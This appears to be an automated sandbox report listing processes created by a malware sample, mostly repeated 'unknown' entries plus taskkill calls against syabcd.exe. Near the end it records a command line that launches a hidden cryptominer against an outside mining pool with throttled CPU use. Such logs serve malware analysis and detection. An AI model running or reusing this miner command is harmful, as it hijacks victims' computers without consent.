Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im syabcd.exe	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c taskkill /f /im syabcd.exe&&exit	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: C:\ProgramData\syabcd.exe C:\ProgramData\syabcd.exe -o stratum+tcp://auto.c3pool.org:19999 -u SN -p 1 --max-cpu-usage=25 --cpu-priority 1 --cpu-max-threads-hint=25 -K	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\x00zm3KVwb.exe	Process created: unknown unknown	Jump to behavior
